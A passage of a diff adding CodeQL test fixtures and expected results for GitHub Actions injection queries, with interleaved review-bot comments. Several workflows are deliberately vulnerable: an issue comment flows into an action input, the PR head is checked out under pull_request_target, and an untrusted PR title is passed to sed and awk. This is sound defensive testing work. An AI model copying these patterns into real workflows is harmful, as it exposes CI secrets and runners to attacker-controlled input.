$GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho 
"CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | +subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref new file mode 100644 index 000000000000..fc6a3a80c984 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml b/actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml new file mode 100644 index 000000000000..d87c3cad0068 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml 
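Review bot: The `#select` section of EnvVarInjectionMedium.expected is empty, so none of the CWE-077 fixtures yields a positive result for the Medium query — every edge and node listed in this hunk is also present in the EnvVarInjectionCritical.expected hunk above, and the Medium variant produces no alert of its own. If the Medium query is meant to cover the same `$GITHUB_ENV` write sinks under triggers that the Critical variant does not treat as privileged (presumably the distinction between the two; the query source is not in this chunk), the test set needs at least one workflow driven by an event other than `pull_request_target`/`workflow_run` so that a regression in the Medium query is observable. As committed, the expectation only proves the query stays silent on these inputs, which a broken query would satisfy as well.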
@@ -0,0 +1,196 @@
+name: "Run Dagger pipeline"
+description: "Runs a given dagger pipeline"
+inputs:
+ subcommand:
+ description: "Subcommand for airbyte-ci"
+ required: true
+ context:
+ description: "CI context (e.g., pull_request, manual)"
+ required: true
+ github_token:
+ description: "GitHub token"
+ required: false
+ dagger_cloud_token:
+ description: "Dagger Cloud token"
+ required: false
+ docker_hub_username:
+ description: "Dockerhub username"
+ required: false
+ docker_hub_password:
+ description: "Dockerhub password"
+ required: false
+ options:
+ description: "Options for the subcommand"
+ required: false
+ production:
+ description: "Whether to run in production mode"
+ required: false
+ default: "True"
+ report_bucket_name:
+ description: "Bucket name for CI reports"
+ required: false
+ default: "airbyte-ci-reports-multi"
+ gcp_gsm_credentials:
+ description: "GCP credentials for GCP Secret Manager"
+ required: false
+ default: ""
+ gcp_integration_tester_credentials:
+ description: "GCP credentials for integration tests"
+ required: false
+ default: ""
+ git_repo_url:
+ description: "Git repository URL"
+ default: https://github.com/airbytehq/airbyte.git
+ required: false
+ git_branch:
+ description: "Git branch to checkout"
+ required: false
+ git_revision:
+ description: "Git revision to checkout"
+ required: false
+ slack_webhook_url:
+ description: "Slack webhook URL"
+ required: false
+ metadata_service_gcs_credentials:
+ description: "GCP credentials for metadata service"
+ required: false
+ metadata_service_bucket_name:
+ description: "Bucket name for metadata service"
+ required: false
+ default: "prod-airbyte-cloud-connector-metadata-service"
+ sentry_dsn:
+ description: "Sentry DSN"
+ required: false
+ spec_cache_bucket_name:
+ description: "Bucket name for GCS spec cache"
+ required: false
+ default: "io-airbyte-cloud-spec-cache"
+ spec_cache_gcs_credentials:
+ description: "GCP credentials for GCS spec cache"
+ required: false
+ gcs_credentials:
+ description: "GCP credentials for GCS"
+ required: false
+ ci_job_key:
+ description: "CI job key"
+ required: false
+ s3_build_cache_access_key_id:
+ description: "Gradle S3 Build Cache AWS access key ID"
+ required: false
+ s3_build_cache_secret_key:
+ description: "Gradle S3 Build Cache AWS secret key"
+ required: false
+ airbyte_ci_binary_url:
+ description: "URL to airbyte-ci binary"
+ required: false
+ default: https://connectors.airbyte.com/airbyte-ci/releases/ubuntu/latest/airbyte-ci
+ python_registry_token:
+ description: "Python registry API token to publish python package"
+ required: false
+ is_fork:
+ description: "Whether the PR is from a fork"
+ required: false
+ default: "false"
+ max_attempts:
+ description: "Number of attempts at running the airbyte-ci command"
+ required: false
+ default: 1
+ retry_wait_seconds:
+ description: "Number of seconds to wait between retry attempts"
+ required: false
+ default: 60
+
+runs:
+ using: "composite"
+ steps:
+ - name: Get start timestamp
+ id: get-start-timestamp
+ shell: bash
+ run: echo "start-timestamp=$(date +%s)" >> $GITHUB_OUTPUT
+ - name: Docker login
+ id: docker-login
+ uses: docker/login-action@v3
+ if: ${{ inputs.docker_hub_username != '' && inputs.docker_hub_password != '' }}
+ with:
+ username: ${{ inputs.docker_hub_username }}
+ password: ${{ inputs.docker_hub_password }}
+ - name: Install Airbyte CI
+ id: install-airbyte-ci
+ uses: ./.github/actions/install-airbyte-ci
+ with:
+ airbyte_ci_binary_url: ${{ inputs.airbyte_ci_binary_url }}
+ is_fork: ${{ inputs.is_fork }}
+ - name: Run airbyte-ci
+ id: run-airbyte-ci
+ uses: nick-fields/retry@v3
+ env:
+ CI: "True"
+ CI_GIT_USER: ${{ github.repository_owner }}
+ CI_PIPELINE_START_TIMESTAMP: ${{ steps.get-start-timestamp.outputs.start-timestamp }}
+ PULL_REQUEST_NUMBER: ${{ github.event.pull_request.number }}
+ # Next environment variables are workflow inputs based and can be set with empty values if the inputs are not required and passed
+ CI_CONTEXT: "${{ inputs.context }}"
+ CI_GIT_BRANCH: ${{ inputs.git_branch || github.head_ref }}
+ CI_GIT_REPO_URL: ${{ inputs.git_repo_url }}
+ CI_GIT_REVISION: ${{ inputs.git_revision || github.sha }}
+ CI_GITHUB_ACCESS_TOKEN: ${{ inputs.github_token }}
+ CI_JOB_KEY: ${{ inputs.ci_job_key }}
+ CI_REPORT_BUCKET_NAME: ${{ inputs.report_bucket_name }}
+ DAGGER_CLOUD_TOKEN: "${{ inputs.dagger_cloud_token }}"
+ DOCKER_HUB_PASSWORD: ${{ inputs.docker_hub_password }}
+ DOCKER_HUB_USERNAME: ${{ inputs.docker_hub_username }}
+ GCP_GSM_CREDENTIALS: ${{ inputs.gcp_gsm_credentials }}
+ GCP_INTEGRATION_TESTER_CREDENTIALS: ${{ inputs.gcp_integration_tester_credentials }}
+ GCS_CREDENTIALS: ${{ inputs.gcs_credentials }}
+ METADATA_SERVICE_BUCKET_NAME: ${{ inputs.metadata_service_bucket_name }}
+ METADATA_SERVICE_GCS_CREDENTIALS: ${{ inputs.metadata_service_gcs_credentials }}
+ PRODUCTION: ${{ inputs.production }}
+ PYTHON_REGISTRY_TOKEN: ${{ inputs.python_registry_token }}
+ PYTHON_REGISTRY_URL: ${{ inputs.python_registry_url }}
+ S3_BUILD_CACHE_ACCESS_KEY_ID: ${{ inputs.s3_build_cache_access_key_id }}
+ S3_BUILD_CACHE_SECRET_KEY: ${{ inputs.s3_build_cache_secret_key }}
+ SENTRY_DSN: ${{ inputs.sentry_dsn }}
+ SLACK_WEBHOOK: ${{ inputs.slack_webhook_url }}
+ SPEC_CACHE_BUCKET_NAME: ${{ inputs.spec_cache_bucket_name }}
+ SPEC_CACHE_GCS_CREDENTIALS: ${{ inputs.spec_cache_gcs_credentials }}
+ with:
+ shell: bash
+ max_attempts: ${{ inputs.max_attempts }}
+ retry_wait_seconds: ${{ inputs.retry_wait_seconds }}
+ # 360mn > 6 hours: it's the GitHub runner max job duration
+ timeout_minutes: 360
+ command: |
+ airbyte-ci --disable-update-check --disable-dagger-run --is-ci --gha-workflow-run-id=${{ github.run_id }} ${{ inputs.subcommand }} ${{ inputs.options }}
+ - name: Stop Engine
+ id: stop-engine
+ if: always()
+ shell: bash
+ run: |
+ mapfile -t containers < <(docker ps --filter name="dagger-engine-*" -q)
+ if [[ "${#containers[@]}" -gt 0 ]]; then
+ # give 5mn to the Dagger Engine to push cache data to Dagger Cloud
+ docker stop -t 300 "${containers[@]}";
+ fi
+
+ - name: Collect dagger engine logs
+ id: collect-dagger-engine-logs
+ if: always()
+ uses: jwalton/gh-docker-logs@v2
+ with:
+ dest: "./dagger_engine_logs"
+ images: "registry.dagger.io/engine"
+
+ - name: Tar logs
+ id: tar-logs
+ if: always()
+ shell: bash
+ run: tar cvzf ./dagger_engine_logs.tgz ./dagger_engine_logs
+
+ - name: Upload logs to GitHub
+ id: upload-dagger-engine-logs
+ if: always()
+ uses: actions/upload-artifact@v4
+ with:
+ name: ${{ github.job }}_dagger_engine_logs.tgz
+ path: ./dagger_engine_logs.tgz
+ retention-days: 7
diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
new file mode 100644
index 000000000000..4b6888449c00
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
@@ -0,0 +1,9 @@
+on: issue_comment
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: ruby/setup-ruby@v2
+ with:
+ ruby-version: ${{ github.event.comment.body }}
diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml
new file mode 100644
index 000000000000..db04b69ac168
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml
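Review bot: The `env:` block of the Run airbyte-ci step sets `PYTHON_REGISTRY_URL: ${{ inputs.python_registry_url }}`, but no `python_registry_url` input is declared under `inputs:` (only `python_registry_token` is), so that variable is always empty at runtime. If this fixture is meant to mirror the upstream action verbatim, a one-line comment saying so would stop reviewers from chasing it; otherwise declare the input or drop the line. The four new CWE-078 fixtures (this action, comment_issue.yml, documentation.yml and test1.yml) carry no marker of which step is expected in the `.expected` output, unlike the `# VULNERABLE` / `# NOT VULNERABLE` comments in the CWE-088 arg_injection.yml fixture; CommandInjectionCritical.expected reports only `ruby-version: ${{ github.event.comment.body }}` in comment_issue.yml, so the other three presumably serve as negative cases. A `# VULNERABLE` comment above that `with:` entry in comment_issue.yml, and a short header comment in each negative fixture stating why it must not be reported, would make the `.expected` files reviewable without re-running the queries.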
@@ -0,0 +1,87 @@
+name: Documentation
+
+on:
+ workflow_dispatch:
+ pull_request:
+
+jobs:
+ parse_commit_info:
+ runs-on: ubuntu-latest
+ outputs:
+ can_deploy: ${{ steps.decide.outputs.can_deploy }}
+ deploy_to: ${{ steps.decide.outputs.deploy_to }}
+
+ steps:
+ - name: Checkout Code
+ uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Copy build utils
+ run: |
+ cp -r .github/utils ../utils
+
+ - name: Decide Whether to Build and/or Release
+ id: decide
+ run: |
+ set -xe
+ CAN_DEPLOY=$(python ../utils/please.py can_i_deploy_documentation)
+ DEPLOY_TO=$(python ../utils/please.py where_can_i_deploy_documentation)
+
+ echo "can_deploy=$CAN_DEPLOY" >> $GITHUB_OUTPUT
+ echo "deploy_to=$DEPLOY_TO" >> $GITHUB_OUTPUT
+ echo github.ref ${{ github.ref }}
+
+ build-documentation:
+ runs-on: ubuntu-latest
+ needs: parse_commit_info
+
+ strategy:
+ matrix:
+ python-version: [3.11]
+
+ steps:
+ - name: Checkout Code
+ uses: actions/checkout@v4
+
+ - name: Setup Python
+ uses: actions/setup-python@v5
+ with:
+ python-version: ${{ matrix.python-version }}
+
+ - name: Install Quarto
+ uses: quarto-dev/quarto-actions/setup@v2
+ with:
+ version: pre-release
+
+ - name: Install Package
+ shell: bash
+ run: |
+ make doc-deps
+
+ - name: Environment Information
+ shell: bash
+ run: |
+ ls -la
+ ls -la doc
+ pip list
+
+ - name: Build docs
+ shell: bash
+ run: |
+ pushd doc; make doc; popd
+
+ - name: Environment Information
+ shell: bash
+ run: |
+ ls -la doc
+ cat doc/_variables.yml
+ ls -la doc/reference
+
+ - name: Deploy to Documentation to a Branch
+ uses: JamesIves/github-pages-deploy-action@v4
+ if: contains(needs.parse_commit_info.outputs.can_deploy, 'true')
+ with:
+ folder: doc/_site
+ branch: ${{ needs.parse_commit_info.outputs.deploy_to }}
+ commit-message: ${{ github.event.head_commit.message }}
diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml
new file mode 100644
index 000000000000..6a449e24cf02
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml
@@ -0,0 +1,63 @@
+name: Finalize connector rollout
+
+on:
+ repository_dispatch:
+ types: [finalize-connector-rollout]
+ workflow_dispatch:
+ inputs:
+ connector_name:
+ description: "Connector name"
+ required: true
+ action:
+ description: "Action to perform"
+ required: true
+ options: ["promote", "rollback"]
+jobs:
+ finalize_rollout:
+ name: Finalize connector rollout
+ runs-on: connector-publish-large
+ env:
+ ACTION: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.action || github.event.client_payload.action }}
+ steps:
+ - name: Check action value
+ run: |
+ if [[ "${ACTION}" != "promote" && "${ACTION}" != "rollback" ]]; then
+ echo "Invalid action: ${ACTION}"
+ exit 1
+ fi
+ shell: bash
+ - name: Checkout Airbyte
+ uses: actions/checkout@v4
+ - name: Promote {{ github.event.client_payload.connector_name }} release candidate
+ id: promote-release-candidate
+ if: ${{ env.ACTION == 'promote' }}
+ uses: ./.github/actions/run-airbyte-ci
+ with:
+ context: "manual"
+ dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }}
+ docker_hub_password: ${{ secrets.DOCKER_HUB_PASSWORD }}
+ docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }}
+ gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }}
+ gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }}
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }}
+ sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }}
+ slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }}
+ subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --promote-release-candidate"
+ - name: Rollback {{ github.event.client_payload.connector_name }} release candidate
+ id: rollback-release-candidate
+ if: ${{ env.ACTION == 'rollback' }}
+ uses: ./.github/actions/run-airbyte-ci
+ with:
+ context: "manual"
+ dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }}
+ docker_hub_password: ${{ 
secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + spec_cache_gcs_credentials: ${{ secrets.SPEC_CACHE_SERVICE_ACCOUNT_KEY_PUBLISH }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --rollback-release-candidate" diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected new file mode 100644 index 000000000000..281fd39552a7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref new file mode 100644 index 000000000000..0cdb9a399a84 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref 
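Review bot: The two step names `Promote {{ github.event.client_payload.connector_name }} release candidate` and `Rollback {{ github.event.client_payload.connector_name }} release candidate` use `{{ … }}` without the leading `$`, so the connector name is never interpolated and the names are displayed literally. If the fixture intentionally reproduces the upstream workflow as-is, a comment saying so avoids a later "fix" that changes the fixture's shape; otherwise write `${{ github.event.client_payload.connector_name }}` as the `subcommand:` values already do.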
@@ -0,0 +1 @@ +Security/CWE-078/CommandInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected new file mode 100644 index 000000000000..99ebb1edc05d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -0,0 +1,5 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref new file mode 100644 index 000000000000..8e1bab538bbf --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml new file mode 100644 index 000000000000..5d841e50dbb4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml 
@@ -0,0 +1,74 @@
+name: Argument injection
+
+on:
+ pull_request_target:
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ env:
+ TITLE: ${{github.event.pull_request.title}}
+ steps:
+ - name: Checkout
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: |
+ # NOT VULNERABLE
+ echo "s/FOO/$TITLE/g"
+ - run: |
+ # VULNERABLE
+ sed "s/FOO/$TITLE/g"
+ - run: |
+ # VULNERABLE
+ echo "foo" | sed "s/FOO/$TITLE/g" > bar
+ - run: |
+ # VULNERABLE
+ echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar)
+ - run: |
+ # VULNERABLE
+ awk "BEGIN {$TITLE}"
+ - run: |
+ # VULNERABLE
+ sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json
+ - run: |
+ # VULNERABLE
+ sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json
+ - run: |
+ # VULNERABLE
+ sed -e 's##${TITLE}#' \
+ -e 's##${{ env.sot_repo }}#' \
+ -e 's##TITLE#' \
+ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky
+ - run: |
+ # VULNERABLE
+ sed -e 's##TITLE#' \
+ -e 's##${{ env.sot_repo }}#' \
+ -e 's##${TITLE}#' \
+ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky
+ - run: |
+ # VULNERABLE
+ BODY=$(git log --format=%s)
+ sed "s/FOO/$BODY/g" > /tmp/foo
+ - run: |
+ # VULNERABLE
+ BODY=$(git diff --name-only HEAD)
+ sed "s/FOO/$BODY/g" > /tmp/foo
+ - run: |
+ # VULNERABLE
+ BODY=$(git diff --name-only HEAD )
+ sed "s/FOO/$BODY/g" > /tmp/foo
+ - run: |
+ # VULNERABLE
+ BODY=$(git diff --name-only HEAD^ | xargs)
+ sed "s/FOO/$BODY/g" > /tmp/foo
+ - run: |
+ # NOT VULNERABLE
+ echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT
+ - run: |
+ # NOT VULNERABLE
+ git log -1 --pretty=%s
+ - run: |
+ # NOT VULNERABLE
+ BODY=$(git log --format=%s)
+ sed -E 's/\s+/\n/g' <<<"$BODY"
diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
new file mode 100644
index 000000000000..5eddb791ae5c
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected
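Review bot: The `Checkout` step checks out `ref: ${{ github.event.pull_request.head.ref }}` under `pull_request_target` with no annotation, while every `run:` step in the file carries a `# VULNERABLE` / `# NOT VULNERABLE` marker. It appears to be there so that the `git log --format=%s` and `git diff --name-only` output captured into `BODY` in the later steps comes from the pull request head, which is consistent with ArgumentInjectionCritical.expected reporting those steps with the step itself as the source, but nothing in the fixture says so. A comment on the step such as `# PR head is checked out so that the git log / git diff output used as BODY below is PR-controlled` would document the fixture's intent, and `TITLE: ${{github.event.pull_request.title}}` could use the same `${{ ... }}` spacing as the other expressions in the file.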
@@ -0,0 +1,35 @@ +edges +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +nodes +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # 
VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # 
